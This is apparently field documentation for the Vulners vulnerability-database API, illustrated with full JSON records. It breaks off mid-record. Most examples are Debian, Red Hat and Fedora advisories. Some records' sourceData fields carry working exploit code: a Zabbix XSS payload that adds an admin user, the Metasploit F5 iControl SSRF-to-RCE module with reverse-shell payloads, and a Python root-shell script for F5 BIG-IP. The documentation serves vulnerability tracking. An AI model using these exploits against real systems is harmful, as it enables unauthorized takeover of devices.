Vulners keywords¶
The Vulners database contains a large number of documents with many different fields, both basic and specific. Documents are regularly added and updated: every hour/day/week/month/etc. This section contains a description of most of the fields that can be received via the Vulners API and used for your own automation tasks. The fields of each document can be viewed not only through the API wrapper, but also in json format:
Basic keywords¶
id¶
Each document/item in the database has a unique identifier. With this identifier, it is possible to get all fields of the document or identify the document in your system.
Examples:
"id": "WIRED:D3030F3A8D69AC5AFF92CFB9E2D46CEC""id": "GHSA-CGC7-MWP4-3CCX""id": "AKB:B86C17FF-B8F9-4AED-8B70-182C2603C527"
type¶
Type of bulletin vendor, such as Debian, RedHat, ExploitDB, Metasploit, etc. Each bulletinFamily has different types. Format: String
Examples:
"type": "debian"
"type": "RedHat"
"type": "ExploitDB"
"type": "Metasploit"
Example link: [SECURITY] [DLA 2614-1] busybox security update
{
"result": "OK",
"data": {
"documents": {
"DEBIAN:DLA-2614-1:BDB8D": {
"id": "DEBIAN:DLA-2614-1:BDB8D",
"bulletinFamily": "unix",
"title": "[SECURITY] [DLA 2614-1] busybox security update",
"description": "-------------------------------------------------------------------------\nDebian LTS Advisory DLA-2614-1 [email protected]\nhttps://www.debian.org/lts/security/ Markus Koschany\nApril 01, 2021 https://wiki.debian.org/LTS\n-------------------------------------------------------------------------\n\nPackage : busybox\nVersion : 1:1.22.0-19+deb9u2\nCVE ID : CVE-2021-28831\nDebian Bug : 986217\n\nThe gunzip decompressor of Busybox, tiny utilities for small and embedded\nsystems, mishandled the error bit on the huft_build result pointer, with a\nresultant invalid free or segmentation fault, via malformed gzip data. \n\nFor Debian 9 stretch, this problem has been fixed in version\n1:1.22.0-19+deb9u2.\n\nWe recommend that you upgrade your busybox packages.\n\nFor the detailed security status of busybox please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/busybox\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n",
"published": "2021-04-01T22:00:09",
"modified": "2021-04-01T22:00:09",
"cvss": {
"score": 5.0,
"vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"
},
"href": "https://lists.debian.org/debian-lts-announce/2021/debian-lts-announce-202104/msg00001.html",
"reporter": "Debian",
"references": [],
"cvelist": [
"CVE-2021-28831"
],
"type": "debian",
"lastseen": "2021-04-02T13:19:57",
"edition": 1,
"viewCount": 33,
"enchantments": {
"dependencies": {
"references": [
{
"type": "cve",
"idList": [
"CVE-2021-28831"
]
},
{
"type": "fedora",
"idList": [
"FEDORA:1DC3230E9890",
"FEDORA:EA31830F7ECB",
"FEDORA:4B7BA30CB296"
]
},
{
"type": "archlinux",
"idList": [
"ASA-202103-11",
"ASA-202103-12"
]
},
{
"type": "nessus",
"idList": [
"DEBIAN_DLA-2614.NASL",
"FEDORA_2021-D20C8A4730.NASL"
]
}
],
"modified": "2021-04-02T13:19:57",
"rev": 2
},
"score": {
"value": 5.2,
"vector": "NONE",
"modified": "2021-04-02T13:19:57",
"rev": 2
},
"vulnersScore": 5.2
},
"affectedPackage": [
{
"OS": "Debian",
"OSVersion": "9",
"arch": "all",
"operator": "lt",
"packageFilename": "udhcpd_1:1.22.0-19+deb9u2_all.deb",
"packageName": "udhcpd",
"packageVersion": "1:1.22.0-19+deb9u2"
},
{
"OS": "Debian",
"OSVersion": "9",
"arch": "all",
"operator": "lt",
"packageFilename": "busybox_1:1.22.0-19+deb9u2_all.deb",
"packageName": "busybox",
"packageVersion": "1:1.22.0-19+deb9u2"
},
{
"OS": "Debian",
"OSVersion": "9",
"arch": "all",
"operator": "lt",
"packageFilename": "udhcpc_1:1.22.0-19+deb9u2_all.deb",
"packageName": "udhcpc",
"packageVersion": "1:1.22.0-19+deb9u2"
},
{
"OS": "Debian",
"OSVersion": "9",
"arch": "all",
"operator": "lt",
"packageFilename": "busybox-static_1:1.22.0-19+deb9u2_all.deb",
"packageName": "busybox-static",
"packageVersion": "1:1.22.0-19+deb9u2"
},
{
"OS": "Debian",
"OSVersion": "9",
"arch": "all",
"operator": "lt",
"packageFilename": "busybox-syslogd_1:1.22.0-19+deb9u2_all.deb",
"packageName": "busybox-syslogd",
"packageVersion": "1:1.22.0-19+deb9u2"
}
]
}
}
}
}
Example link: (RHSA-2021:0943) Moderate: Red Hat build of Eclipse Vert.x 4.0.3 security update
{
"result": "OK",
"data": {
"documents": {
"RHSA-2021:0943": {
"id": "RHSA-2021:0943",
"type": "redhat",
"bulletinFamily": "unix",
"title": "(RHSA-2021:0943) Moderate: Red Hat build of Eclipse Vert.x 4.0.3 security update",
"description": "This release of Red Hat build of Eclipse Vert.x 4.0.3 includes security updates, bug fixes, and enhancements. For more information, see the release notes listed in the References section.\n\nSecurity Fix(es):\n\n* netty: Information disclosure via the local system temporary directory (CVE-2021-21290)\n\n* netty: possible request smuggling in HTTP/2 due missing validation (CVE-2021-21295)\n\nFor more details about the security issues and their impact, the CVSS score, acknowledgements, and other related information, see the CVE pages listed in the References section.",
"published": "2021-03-31T13:34:13",
"modified": "2021-03-31T13:34:51",
"cvss": {
"score": 2.6,
"vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"
},
"href": "https://access.redhat.com/errata/RHSA-2021:0943",
"reporter": "RedHat",
"references": [],
"cvelist": [
"CVE-2021-21290",
"CVE-2021-21295"
],
"lastseen": "2021-03-31T10:28:30",
"viewCount": 41,
"enchantments": {
"dependencies": {
"references": [
{
"type": "cve",
"idList": [
"CVE-2021-21295",
"CVE-2021-21290"
]
},
{
"type": "redhat",
"idList": [
"RHSA-2021:0986"
]
},
{
"type": "github",
"idList": [
"GHSA-WM47-8V5P-WJPJ",
"GHSA-5MCR-GQ6C-3HQ2"
]
},
{
"type": "nessus",
"idList": [
"OPENSUSE-2021-448.NASL",
"DEBIAN_DLA-2555.NASL"
]
},
{
"type": "debian",
"idList": [
"DEBIAN:DLA-2555-1:DBD69"
]
}
],
"modified": "2021-03-31T10:28:30",
"rev": 2
},
"score": {
"value": 4.9,
"vector": "NONE",
"modified": "2021-03-31T10:28:30",
"rev": 2
},
"vulnersScore": 4.9
},
"affectedPackage": []
}
}
}
}
Example link: Zabbix 3.4.7 - Stored XSS
{
"result": "OK",
"data": {
"documents": {
"EDB-ID:49729": {
"id": "EDB-ID:49729",
"type": "exploitdb",
"bulletinFamily": "exploit",
"title": "Zabbix 3.4.7 - Stored XSS",
"description": "",
"published": "2021-03-31T00:00:00",
"modified": "2021-03-31T00:00:00",
"cvss": {
"score": 6.4,
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"
},
"href": "https://www.exploit-db.com/exploits/49729",
"reporter": "Exploit-DB",
"references": [],
"cvelist": [
"CVE-2019-17382"
],
"lastseen": "2021-03-31T08:29:46",
"viewCount": 244,
"enchantments": {
"dependencies": {
"references": [
{
"type": "cve",
"idList": [
"CVE-2019-17382"
]
},
{
"type": "packetstorm",
"idList": [
"PACKETSTORM:162032"
]
}
],
"modified": "2021-03-31T08:29:46",
"rev": 2
},
"score": {
"value": 4.9,
"vector": "NONE",
"modified": "2021-03-31T08:29:46",
"rev": 2
},
"vulnersScore": 4.9
},
"sourceHref": "https://www.exploit-db.com/download/49729",
"sourceData": "# Exploit Title: Zabbix 3.4.7 - Stored XSS\r\n# Date: 30-03-2021\r\n# Exploit Author: Radmil Gazizov\r\n# Vendor Homepage: https://www.zabbix.com/\r\n# Software Link: https://www.zabbix.com/rn/rn3.4.7\r\n# Version: 3.4.7\r\n# Tested on: Linux\r\n\r\n# Reference -\r\nhttps://github.com/GloryToMoon/POC_codes/blob/main/zabbix_stored_xss_347.txt\r\n\r\n1- Go to /zabbix/zabbix.php?action=dashboard.list (anonymous login CVE-2019-17382)\r\n2- Create new dashboard\r\n3- Add a new widget => Type: Map nabigation tree\r\n4- Past into parameter \"Name\": <img src=\"x\" onerror=\"var n='hck',q=jQuery;q.post('users.php',{sid:q('#sid').attr('value'),form:'Create+user',alias:n,name:n,surname:n,'user_groups[]':7,password1:n,password2:n,theme:'default',refresh:'9s',rows_per_page:9,url:'',user_type:3,add:'Add'});\">\r\n5- Click to \"Add\" button",
"osvdbidlist": []
}
}
}
}
Example link: F5 iControl REST Unauthenticated SSRF Token Generation RCE
{
"result": "OK",
"data": {
"documents": {
"MSF:EXPLOIT/LINUX/HTTP/F5_ICONTROL_REST_SSRF_RCE/": {
"id": "MSF:EXPLOIT/LINUX/HTTP/F5_ICONTROL_REST_SSRF_RCE/",
"type": "metasploit",
"bulletinFamily": "exploit",
"title": "F5 iControl REST Unauthenticated SSRF Token Generation RCE",
"description": "This module exploits a pre-auth SSRF in the F5 iControl REST API's /mgmt/shared/authn/login endpoint to generate an X-F5-Auth-Token that can be used to execute root commands on an affected BIG-IP or BIG-IQ device. This vulnerability is known as CVE-2021-22986. CVE-2021-22986 affects the following BIG-IP versions: * 12.1.0 - 12.1.5 * 13.1.0 - 13.1.3 * 14.1.0 - 14.1.3 * 15.1.0 - 15.1.2 * 16.0.0 - 16.0.1 And the following BIG-IQ versions: * 6.0.0 - 6.1.0 * 7.0.0 * 7.1.0 Tested against BIG-IP Virtual Edition 16.0.1 in VMware Fusion.\n",
"published": "2021-03-31T19:02:32",
"modified": "2021-03-31T19:02:32",
"cvss": {
"score": 0.0,
"vector": "NONE"
},
"href": "",
"reporter": "Rapid7",
"references": [],
"cvelist": [
"CVE-2021-22986"
],
"lastseen": "2021-04-01T18:34:34",
"viewCount": 19,
"enchantments": {
"dependencies": {
"references": [
{
"type": "cve",
"idList": [
"CVE-2021-22986"
]
},
{
"type": "attackerkb",
"idList": [
"AKB:930A50FF-16A2-4EA8-91C8-71360A643E5E"
]
},
{
"type": "impervablog",
"idList": [
"IMPERVABLOG:3D5A9B1B55D73BE6810D0DB036F8B83F"
]
},
{
"type": "nessus",
"idList": [
"F5_BIGIP_SOL03009991.NASL"
]
},
{
"type": "packetstorm",
"idList": [
"PACKETSTORM:162066",
"PACKETSTORM:162059"
]
},
{
"type": "exploitdb",
"idList": [
"EDB-ID:49738"
]
},
{
"type": "thn",
"idList": [
"THN:D31DB501A57ADE0C1DBD12724D8CA44C",
"THN:4959B86491B72239BCAF1958D167D57D"
]
},
{
"type": "cisa",
"idList": [
"CISA:A55091A825D08BAA55750010D4193771"
]
},
{
"type": "threatpost",
"idList": [
"THREATPOST:1D03F5885684829E899CEE4F63F5AC27",
"THREATPOST:BC4ECD6616ADCCFFD5717D0A9A0D065B"
]
},
{
"type": "rapid7blog",
"idList": [
"RAPID7BLOG:72759E1136A76135F26DD97485912606",
"RAPID7BLOG:764CA6BDCBE5F8F001B5E508AE0659CC"
]
}
],
"modified": "2021-04-01T18:34:34",
"rev": 2
},
"score": {
"value": 6.6,
"vector": "NONE",
"modified": "2021-04-01T18:34:34",
"rev": 2
},
"vulnersScore": 6.6
},
"sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/f5_icontrol_rest_ssrf_rce.rb",
"sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'F5 iControl REST Unauthenticated SSRF Token Generation RCE',\n 'Description' => %q{\n This module exploits a pre-auth SSRF in the F5 iControl REST API's\n /mgmt/shared/authn/login endpoint to generate an X-F5-Auth-Token that\n can be used to execute root commands on an affected BIG-IP or BIG-IQ\n device. This vulnerability is known as CVE-2021-22986.\n\n CVE-2021-22986 affects the following BIG-IP versions:\n\n * 12.1.0 - 12.1.5\n * 13.1.0 - 13.1.3\n * 14.1.0 - 14.1.3\n * 15.1.0 - 15.1.2\n * 16.0.0 - 16.0.1\n\n And the following BIG-IQ versions:\n\n * 6.0.0 - 6.1.0\n * 7.0.0\n * 7.1.0\n\n Tested against BIG-IP Virtual Edition 16.0.1 in VMware Fusion.\n },\n 'Author' => [\n 'wvu', # Analysis and exploit\n 'Rich Warren' # First blood (RCE) and endpoint collaboration\n ],\n 'References' => [\n ['CVE', '2021-22986'],\n ['URL', 'https://support.f5.com/csp/article/K03009991'],\n ['URL', 'https://attackerkb.com/assessments/f6b19d24-b24e-4abd-98cf-2988d7424311'],\n ['URL', 'https://research.nccgroup.com/2021/03/18/rift-detection-capabilities-for-recent-f5-big-ip-big-iq-icontrol-rest-api-vulnerabilities-cve-2021-22986/']\n # https://clouddocs.f5.com/products/big-iq/mgmt-api/v7.0.0/ApiReferences/bigiq_public_api_ref/r_auth_login.html\n ],\n 'DisclosureDate' => '2021-03-10', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_python_ssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'CMDSTAGER::FLAVOR' => :bourne,\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION], # Only one concurrent session\n 'SideEffects' => [\n IOC_IN_LOGS, # /var/log/restjavad.0.log (rotated)\n ACCOUNT_LOCKOUTS, # Unlikely with bigipAuthCookie\n ARTIFACTS_ON_DISK # CmdStager\n ]\n }\n )\n )\n\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'Base path', '/']),\n OptString.new('USERNAME', [true, 'Valid admin username', 'admin']),\n OptString.new('ENDPOINT', [false, 'Custom token generation endpoint'])\n ])\n\n register_advanced_options([\n OptFloat.new('CmdExecTimeout', [true, 'Command execution timeout', 3.5])\n ])\n end\n\n def username\n datastore['USERNAME']\n end\n\n def user_reference_endpoint\n normalize_uri(target_uri.path, '/mgmt/shared/authz/users', username)\n end\n\n def check\n generate_token_ssrf ? CheckCode::Vulnerable : CheckCode::Safe\n end\n\n def exploit\n return unless (@token ||= generate_token_ssrf)\n\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def generate_token_ssrf\n print_status('Generating token via SSRF...')\n vprint_status(\"Username: #{username}\")\n vprint_status(\"Endpoint: #{login_reference_endpoint}\")\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/mgmt/shared/authn/login'),\n 'ctype' => 'application/json',\n 'data' => {\n 'username' => username,\n 'bigipAuthCookie' => '',\n 'authProviderName' => 'local',\n 'loginReference' => {\n 'link' => \"https://localhost#{login_reference_endpoint}\"\n },\n 'userReference' => {\n 'link' => \"https://localhost#{user_reference_endpoint}\"\n }\n }.to_json\n )\n\n unless res&.code == 200 && (@token = res.get_json_document.dig('token', 'token'))\n print_error('Failed to generate token')\n return\n end\n\n print_good(\"Successfully generated token: #{@token}\")\n @token\n end\n\n def execute_command(cmd, _opts = {})\n bash_cmd = \"eval $(echo #{Rex::Text.encode_base64(cmd)} | base64 -d)\"\n\n print_status(\"Executing command: #{bash_cmd}\")\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/mgmt/tm/util/bash'),\n 'ctype' => 'application/json',\n 'headers' => {\n 'X-F5-Auth-Token' => @token\n },\n 'data' => {\n 'command' => 'run',\n 'utilCmdArgs' => \"-c '#{bash_cmd}'\"\n }.to_json\n }, datastore['CmdExecTimeout'])\n\n unless res\n vprint_warning('Command execution timed out')\n return\n end\n\n unless res.code == 200 && res.get_json_document['kind'] == 'tm:util:bash:runstate'\n fail_with(Failure::PayloadFailed, 'Failed to execute command')\n end\n\n print_good('Successfully executed command')\n\n return unless (cmd_result = res.get_json_document['commandResult'])\n\n vprint_line(cmd_result)\n end\n\n def login_reference_endpoint\n if datastore['ENDPOINT']\n return normalize_uri(target_uri.path, datastore['ENDPOINT'])\n end\n\n @token_generation_endpoint ||= token_generation_endpoints.sample\n\n normalize_uri(target_uri.path, @token_generation_endpoint)\n end\n\n # Usable token generation endpoints between versions 12.1.4 and 16.0.1\n def token_generation_endpoints\n %w[\n /access/file-path-manager/indexing\n /cm/autodeploy/cluster-software-images/indexing\n /cm/autodeploy/qkview/indexing\n /cm/autodeploy/software-images/indexing\n /cm/autodeploy/software-volume-install/indexing\n /cm/system/authn/providers/tmos/1f44a60e-11a7-3c51-a49f-82983026b41b/users/indexing\n /cm/system/authn/providers/tmos/indexing\n /mgmt/shared/analytics/avr-proxy-tasks\n /mgmt/shared/gossip\n /mgmt/shared/gossip-peer-refresher\n /mgmt/shared/identified-devices/config/device-refresh\n /mgmt/shared/save-config\n /mgmt/tm/shared/bigip-failover-state\n /shared/analytics/avr-proxy-tasks\n /shared/analytics/avr-proxy-tasks/indexing\n /shared/analytics/event-aggregation-tasks/indexing\n /shared/analytics/event-analysis-tasks/indexing\n /shared/authn/providers/local/groups/indexing\n /shared/authz/remote-resources/indexing\n /shared/authz/resource-groups/indexing\n /shared/authz/roles/indexing\n /shared/authz/tokens/indexing\n /shared/chassis-framework-upgrades/indexing\n /shared/device-discovery-tasks/indexing\n /shared/device-group-key-pairs/indexing\n /shared/echo/indexing\n /shared/framework-info-tasks/indexing\n /shared/framework-upgrades/indexing\n /shared/gossip\n /shared/gossip-peer-refresher\n /shared/group-task/indexing\n /shared/iapp/blocks/indexing\n /shared/iapp/build-package/indexing\n /shared/iapp/health-prefix-map/indexing\n /shared/iapp/package-management-tasks/indexing\n /shared/iapp/template-loader/indexing\n /shared/identified-devices/config/device-refresh\n /shared/nodejs/loader-path-config/indexing\n /shared/package-deployments/indexing\n /shared/resolver/device-groups/indexing\n /shared/resolver/device-groups/tm-shared-all-big-ips/devices/indexing\n /shared/root-framework-upgrades/indexing\n /shared/rpm-tasks/indexing\n /shared/save-config\n /shared/snapshot-task/indexing\n /shared/snapshot/indexing\n /shared/stats-information/indexing\n /shared/storage/tasks/indexing\n /shared/task-scheduler/scheduler/indexing\n /shared/tmsh-shell/indexing\n /tm/analytics/afm-sweeper/generate-report/indexing\n /tm/analytics/afm-sweeper/report-results/indexing\n /tm/analytics/application-security-anomalies/generate-report/indexing\n /tm/analytics/application-security-anomalies/report-results/indexing\n /tm/analytics/application-security-network/generate-report/indexing\n /tm/analytics/application-security-network/report-results/indexing\n /tm/analytics/application-security/generate-report/indexing\n /tm/analytics/application-security/report-results/indexing\n /tm/analytics/asm-bypass/generate-report/indexing\n /tm/analytics/asm-bypass/report-results/indexing\n /tm/analytics/asm-cpu/generate-report/indexing\n /tm/analytics/asm-cpu/report-results/indexing\n /tm/analytics/asm-memory/generate-report/indexing\n /tm/analytics/asm-memory/report-results/indexing\n /tm/analytics/cpu/generate-report/indexing\n /tm/analytics/cpu/report-results/indexing\n /tm/analytics/disk-info/generate-report/indexing\n /tm/analytics/disk-info/report-results/indexing\n /tm/analytics/dns/generate-report/indexing\n /tm/analytics/dns/report-results/indexing\n /tm/analytics/dos-l3/generate-report/indexing\n /tm/analytics/dos-l3/report-results/indexing\n /tm/analytics/http/generate-report/indexing\n /tm/analytics/http/report-results/indexing\n /tm/analytics/ip-intelligence/generate-report/indexing\n /tm/analytics/ip-intelligence/report-results/indexing\n /tm/analytics/ip-layer/generate-report/indexing\n /tm/analytics/ip-layer/report-results/indexing\n /tm/analytics/lsn-pool/generate-report/indexing\n /tm/analytics/lsn-pool/report-results/indexing\n /tm/analytics/memory/generate-report/indexing\n /tm/analytics/memory/report-results/indexing\n /tm/analytics/network/generate-report/indexing\n /tm/analytics/network/report-results/indexing\n /tm/analytics/pem/generate-report/indexing\n /tm/analytics/pem/report-results/indexing\n /tm/analytics/proc-cpu/generate-report/indexing\n /tm/analytics/proc-cpu/report-results/indexing\n /tm/analytics/protocol-security-http/generate-report/indexing\n /tm/analytics/protocol-security-http/report-results/indexing\n /tm/analytics/protocol-security/generate-report/indexing\n /tm/analytics/protocol-security/report-results/indexing\n /tm/analytics/sip/generate-report/indexing\n /tm/analytics/sip/report-results/indexing\n /tm/analytics/swg-blocked/generate-report/indexing\n /tm/analytics/swg-blocked/report-results/indexing\n /tm/analytics/swg/generate-report/indexing\n /tm/analytics/swg/report-results/indexing\n /tm/analytics/tcp-analytics/generate-report/indexing\n /tm/analytics/tcp-analytics/report-results/indexing\n /tm/analytics/tcp/generate-report/indexing\n /tm/analytics/tcp/report-results/indexing\n /tm/analytics/udp/generate-report/indexing\n /tm/analytics/udp/report-results/indexing\n /tm/analytics/vcmp/generate-report/indexing\n /tm/analytics/vcmp/report-results/indexing\n /tm/analytics/virtual/generate-report/indexing\n /tm/analytics/virtual/report-results/indexing\n /tm/shared/bigip-failover-state\n /tm/shared/sys/backup/indexing\n ]\n end\n\nend\n",
"metasploitReliability": "",
"metasploitHistory": ""
}
}
}
}
bulletinFamily¶
Bulletin families, such as:
- 1. Unix
- 2. Exploit
- 3. Tools
- 4. Software
- 5. NVD
- 6. Microsoft
- 7. News
- 8. Blog
- 9. Info
- 10. Bugbounty
Each family has specific fields. Format: String
Examples:
"bulletinFamily": "Unix"
"bulletinFamily": "Exploit"
"bulletinFamily": "Info"
"bulletinFamily": "Tools"
Example link: [SECURITY] Fedora 33 Update: kernel-tools-5.11.11-200.fc33
{
"result": "OK",
"data": {
"documents": {
"FEDORA:9081130C99AB": {
"id": "FEDORA:9081130C99AB",
"type": "fedora",
"bulletinFamily": "unix",
"title": "[SECURITY] Fedora 33 Update: kernel-tools-5.11.11-200.fc33",
"description": "This package contains the tools/ directory from the kernel source and the supporting documentation. ",
"published": "2021-04-02T01:22:21",
"modified": "2021-04-02T01:22:21",
"cvss": {
"score": 0.0,
"vector": "NONE"
},
"href": "",
"reporter": "Fedora",
"references": [],
"cvelist": [
"CVE-2021-29646",
"CVE-2021-29647",
"CVE-2021-29648",
"CVE-2021-29649",
"CVE-2021-29650"
],
"lastseen": "2021-04-02T22:46:17",
"viewCount": 19,
"enchantments": {
"dependencies": {
"references": [
{
"type": "fedora",
"idList": [
"FEDORA:076F830528F3",
"FEDORA:74FD430C99A1",
"FEDORA:604C9309D33B",
"FEDORA:208C6306A247",
"FEDORA:B309B305D40A",
"FEDORA:E66B630C998B",
"FEDORA:DEF49309BE28",
"FEDORA:7A7D4309D9BC"
]
},
{
"type": "cve",
"idList": [
"CVE-2021-29646",
"CVE-2021-29649",
"CVE-2021-29647",
"CVE-2021-29650",
"CVE-2021-29648"
]
}
],
"modified": "2021-04-02T22:46:17",
"rev": 2
},
"score": {
"value": 4.7,
"vector": "NONE",
"modified": "2021-04-02T22:46:17",
"rev": 2
},
"vulnersScore": 4.7
},
"affectedPackage": [
{
"OS": "Fedora",
"OSVersion": "33",
"arch": "any",
"packageName": "kernel-tools",
"packageVersion": "5.11.11",
"packageFilename": "UNKNOWN",
"operator": "lt"
}
]
}
}
}
}
Example link: F5 BIG-IP 16.0.x Remote Code Execution
{
"result": "OK",
"data": {
"documents": {
"PACKETSTORM:162066": {
"id": "PACKETSTORM:162066",
"type": "packetstorm",
"bulletinFamily": "exploit",
"title": "F5 BIG-IP 16.0.x Remote Code Execution",
"description": "",
"published": "2021-04-02T00:00:00",
"modified": "2021-04-02T00:00:00",
"cvss": {
"score": 0.0,
"vector": "NONE"
},
"href": "https://packetstormsecurity.com/files/162066/F5-BIG-IP-16.0.x-Remote-Code-Execution.html",
"reporter": "Al1ex",
"references": [],
"cvelist": [
"CVE-2021-22986"
],
"lastseen": "2021-04-02T14:19:05",
"viewCount": 90,
"enchantments": {
"dependencies": {
"references": [
{
"type": "cve",
"idList": [
"CVE-2021-22986"
]
},
{
"type": "attackerkb",
"idList": [
"AKB:930A50FF-16A2-4EA8-91C8-71360A643E5E"
]
},
{
"type": "impervablog",
"idList": [
"IMPERVABLOG:3D5A9B1B55D73BE6810D0DB036F8B83F"
]
},
{
"type": "nessus",
"idList": [
"F5_BIGIP_SOL03009991.NASL"
]
},
{
"type": "metasploit",
"idList": [
"MSF:EXPLOIT/LINUX/HTTP/F5_ICONTROL_REST_SSRF_RCE/"
]
},
{
"type": "exploitdb",
"idList": [
"EDB-ID:49738"
]
},
{
"type": "packetstorm",
"idList": [
"PACKETSTORM:162059"
]
},
{
"type": "thn",
"idList": [
"THN:D31DB501A57ADE0C1DBD12724D8CA44C",
"THN:4959B86491B72239BCAF1958D167D57D"
]
},
{
"type": "cisa",
"idList": [
"CISA:A55091A825D08BAA55750010D4193771"
]
},
{
"type": "threatpost",
"idList": [
"THREATPOST:BC4ECD6616ADCCFFD5717D0A9A0D065B",
"THREATPOST:1D03F5885684829E899CEE4F63F5AC27"
]
},
{
"type": "rapid7blog",
"idList": [
"RAPID7BLOG:764CA6BDCBE5F8F001B5E508AE0659CC",
"RAPID7BLOG:72759E1136A76135F26DD97485912606"
]
}
],
"modified": "2021-04-02T14:19:05",
"rev": 2
},
"score": {
"value": 6.5,
"vector": "NONE",
"modified": "2021-04-02T14:19:05",
"rev": 2
},
"vulnersScore": 6.5
},
"sourceHref": "https://packetstormsecurity.com/files/download/162066/f5bigip16-exec.txt",
"sourceData": "`# Exploit Title: F5 BIG-IP 16.0.x - iControl REST Remote Code Execution (Unauthenticated) \n# Exploit Author: Al1ex \n# Vendor Homepage: https://www.f5.com/products/big-ip-services \n# Version: 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 amd BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2 \n# CVE : CVE-2021-22986 \n \nimport requests \nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning \nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning) \nimport sys \n \n \ndef title(): \nprint(''' \n______ ____ ____ _______ ___ ___ ___ __ ___ ___ ___ ___ __ \n/ |\\ \\ / / | ____| |__ \\ / _ \\ |__ \\ /_ | |__ \\ |__ \\ / _ \\ / _ \\ / / \n| ,----' \\ \\/ / | |__ ______ ) | | | | | ) | | | ______ ) | ) | | (_) | | (_) | / /_ \n| | \\ / | __| |______/ / | | | | / / | | |______/ / / / \\__, | > _ < | '_ \\ \n| `----. \\ / | |____ / /_ | |_| | / /_ | | / /_ / /_ / / | (_) | | (_) | \n\\______| \\__/ |_______| |____| \\___/ |____| |_| |____| |____| /_/ \\___/ \\___/ \n \nAuthor:Al1ex@Heptagram \nGithub:https://github.com/Al1ex \n''') \n \ndef exploit(url): \ntarget_url = url + '/mgmt/shared/authn/login' \ndata = { \n\"bigipAuthCookie\":\"\", \n\"username\":\"admin\", \n\"loginReference\":{\"link\":\"/shared/gossip\"}, \n\"userReference\":{\"link\":\"https://localhost/mgmt/shared/authz/users/admin\"} \n} \nheaders = { \n\"User-Agent\": \"hello-world\", \n\"Content-Type\":\"application/x-www-form-urlencoded\" \n} \nresponse = requests.post(target_url, headers=headers, json=data, verify=False, timeout=15) \nif \"/mgmt/shared/authz/tokens/\" not in response.text: \nprint('(-) Get token fail !!!') \nprint('(*) Tested Method 2:') \nheader_2 = { \n'User-Agent': 'hello-world', \n'Content-Type': 'application/json', \n'X-F5-Auth-Token': '', \n'Authorization': 'Basic YWRtaW46QVNhc1M=' \n} \ndata_2 = { \n\"command\": \"run\", \n\"utilCmdArgs\": \"-c whoami\" \n} \ncheck_url = url + '/mgmt/tm/util/bash' \ntry: \nresponse2 = requests.post(url=check_url, json=data_2, headers=header_2, verify=False, timeout=20) \nif response2.status_code == 200 and 'commandResult' in response2.text: \nwhile True: \ncmd = input(\"(:CMD)> \") \ndata_3 = {\"command\": \"run\", \"utilCmdArgs\": \"-c '%s'\"%(cmd)} \nr = requests.post(url=check_url, json=data_3, headers=header_2, verify=False) \nif r.status_code == 200 and 'commandResult' in r.text: \nprint(r.text.split('commandResult\":\"')[1].split('\"}')[0].replace('\\\\n', '')) \nelse: \nprint('(-) Not vuln...') \nexit(0) \nexcept Exception: \nprint('ERROR Connect') \nprint('(+) Extract token: %s'%(response.text.split('\"selfLink\":\"https://localhost/mgmt/shared/authz/tokens/')[1].split('\"}')[0])) \nwhile True: \ncmd = input(\"(:CMD)> \") \nheaders = { \n\"Content-Type\": \"application/json\", \n\"X-F5-Auth-Token\": \"%s\"%(response.text.split('\"selfLink\":\"https://localhost/mgmt/shared/authz/tokens/')[1].split('\"}')[0]) \n} \ndata_json = { \n\"command\": \"run\", \n\"utilCmdArgs\": \"-c \\'%s\\'\"%(cmd) \n} \nexp_url= url + '/mgmt/tm/util/bash' \nexp_req = requests.post(exp_url, headers=headers, json=data_json, verify=False, timeout=15) \nif exp_req.status_code == 200 and 'commandResult' in exp_req.text: \nprint(exp_req.text.split('commandResult\":\"')[1].split('\"}')[0].replace('\\\\n', '')) \nelse: \nprint('(-) Not vuln...') \nexit(0) \n \nif __name__ == '__main__': \ntitle() \nif(len(sys.argv) < 2): \nprint('[+] USAGE: python3 %s https://<target_url>\\n'%(sys.argv[0])) \nexit(0) \nelse: \nexploit(sys.argv[1]) \n \n`\n"
}
}
}
}
Example link: FBI: APTs Actively Exploiting Fortinet VPN Bugs
{
"result": "OK",
"data": {
